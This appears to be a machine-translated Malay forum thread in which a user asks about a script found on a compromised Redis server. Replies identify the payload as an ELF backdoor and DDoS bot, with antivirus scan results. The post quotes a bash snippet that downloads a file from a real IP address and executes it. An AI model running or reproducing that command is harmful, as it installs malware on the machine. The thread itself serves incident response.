linux - Apakah maksud kod penggodam ini?
ringa_lee
ringa_lee 2017-06-07 09:24:08
0
2
930

Hari ini saya mendapati bahawa redis tidak dapat menyambung ke pelayan saya menemui arahan sedemikian pada pelayan

#!/bin/bash
zfile="/tmp/z.TF"

if [ ! -f "$zfile" ]; then  
    wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi

Memuat turun dan melaksanakan fail z.TF Apabila membuka z.TF, ia adalah kod bait Program ini boleh dilaksanakan semula secara automatik.

Pada masa ini, proses program ini dimatikan, tetapi perkhidmatan redis masih tidak tersedia. Saya tidak tahu sama ada terdapat program hasad lain.

Bolehkah seseorang menerangkan kandungan z.TF? Dan bagaimana untuk menanganinya.

ringa_lee
ringa_lee

ringa_lee

membalas semua(2)
巴扎黑

z.TF ialah fail boleh laku Linux dalam format ELF

Pintu belakang telah dipasang pada pelayan anda Pasang semula sistem secepat mungkin untuk membetulkan kelemahan.
Naik taraf semua yang perlu dinaik taraf.


Pada asasnya ia adalah pintu belakang + ayam pedaging

VirSCAN.org Scanned Report :
Scanned time   : 2017-06-06 20:53:39
Scanner results: 10%的杀软(4/39)报告发现病毒
File Name      : z.TF
File Size      : 649640 byte
File Type      : application/x-executable
MD5            : a6f42e73365ad56ce42985c5518d7e34
SHA1           : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
Online report  : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
AVAST!         170303-1       4.7.4             2017-03-03     46   ELF:Ddostf-A                  
SOPHOS         5.32           3.65.2            2016-10-10     8    Linux/DDoS-BE                 
奇虎360         1.0.1          1.0.1             1.0.1          4    Win32/Backdoor.34d            
江民杀毒         16.0.100       1.0.0.0           2017-06-05     2    Backdoor.Linux.wfg            
某草草

By the way, sila hantarkan saya kod t.ZF

Tidakkah anda menerangkan kod yang anda siarkan dengan jelas?

Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan